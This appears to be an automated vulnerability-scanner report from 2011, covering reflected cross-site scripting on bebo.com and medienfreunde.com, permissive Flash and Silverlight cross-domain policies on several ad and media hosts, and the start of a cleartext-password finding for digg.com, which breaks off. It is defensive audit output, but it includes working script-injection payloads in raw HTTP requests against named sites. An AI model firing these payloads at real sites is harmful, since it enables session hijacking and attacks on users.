Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee94a<img%20src%3da%20onerror%3dalert(1)>dae524548ab was submitted in the REST URL parameter 3. This input was echoed as ee94a<img src=a onerror=alert(1)>dae524548ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site/index20_script.jsee94a<img%20src%3da%20onerror%3dalert(1)>dae524548ab?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:20 GMT
Content-Length: 14366
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="content" class="content-wrap">Could not find action: index20_script.jsee94a<img src=a onerror=alert(1)>dae524548ab.</div>
...[SNIP]...

2.99. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 810dd'><script>alert(1)</script>9bdaf6f52b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site/index20_script.js810dd'><script>alert(1)</script>9bdaf6f52b2?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14291
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/site/index20_script_js810dd'><script>alert(1)</script>9bdaf6f52b2&QueryString=fp%3D1ac0db15f4e80064d8323ae07c9b030a&Lang=fr'>
...[SNIP]...

2.100. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /lab/innerfade/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0bc"><script>alert(1)</script>80bc0e527c9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: dc0bc"><script>alert(1)</script>80bc0e527c9

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<!-- saved from url=(0013)about:internet -->
   <hea
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Leipzig&blogurl=dc0bc"><script>alert(1)</script>80bc0e527c9&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

3. Flash cross-domain policy  previous  next
There are 13 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Wed, 06 Jul 2011 11:55:06 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.2. http://adx.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 15:39:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.3. http://bp.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Wed, 06 Jul 2011 15:39:03 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

3.4. http://core.insightexpressai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 06 Jul 2011 15:38:53 GMT
Content-Length: 139
Connection: close
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

3.5. http://ecn.dev.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 16 Jun 2011 00:30:01 GMT
Accept-Ranges: bytes
ETag: "57c5b87bc2bcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:54 GMT
Content-Length: 277
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

3.6. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 23 Jun 2011 03:34:28 GMT
Accept-Ranges: bytes
ETag: "f5f224755631cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Wed, 06 Jul 2011 15:39:03 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.7. http://rs.gwallet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.gwallet.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...

3.8. http://bstats.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

3.9. http://cdn.stumble-upon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.stumble-upon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: application/xml
Content-Length: 460
Date: Wed, 06 Jul 2011 11:15:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
...[SNIP]...

3.10. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Wed, 06 Jul 2011 11:56:38 GMT
Date: Wed, 06 Jul 2011 11:54:38 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.11. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 06 Jul 2011 01:47:26 GMT
Expires: Thu, 07 Jul 2011 01:47:26 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 36459
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.12. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Wed, 06 Jul 2011 11:56:37 GMT
Date: Wed, 06 Jul 2011 11:54:37 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.13. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:02:30 GMT
Server: hi
Status: 200 OK
Last-Modified: Tue, 05 Jul 2011 19:19:41 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Wed, 06 Jul 2011 14:32:30 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4. Silverlight cross-domain policy  previous  next
There are 3 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Wed, 06 Jul 2011 11:55:06 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 16 Jun 2011 00:30:01 GMT
Accept-Ranges: bytes
ETag: "57c5b87bc2bcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:55 GMT
Content-Length: 374
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

4.3. http://profile.live.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: 197a8481-8887-45ea-8ece-afbd16506d13
Set-Cookie: E=P:umIuReUJzog=:GJEjRxGdddMqyUcXEbDkHPosnhQDlAGYffAsX7wlFVE=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:umIuReUJzog=:GJEjRxGdddMqyUcXEbDkHPosnhQDlAGYffAsX7wlFVE=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 09:36:21 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 13-Jul-2011 11:16:21 GMT; path=/
Set-Cookie: sc_clustbl_142=b74b373a208052d8; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:21 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC626 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 11:16:21 GMT
Connection: close
Content-Length: 400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://msc.wlxrs.com"/>

...[SNIP]...

5. Cleartext submission of password  previous  next
There are 10 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://digg.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
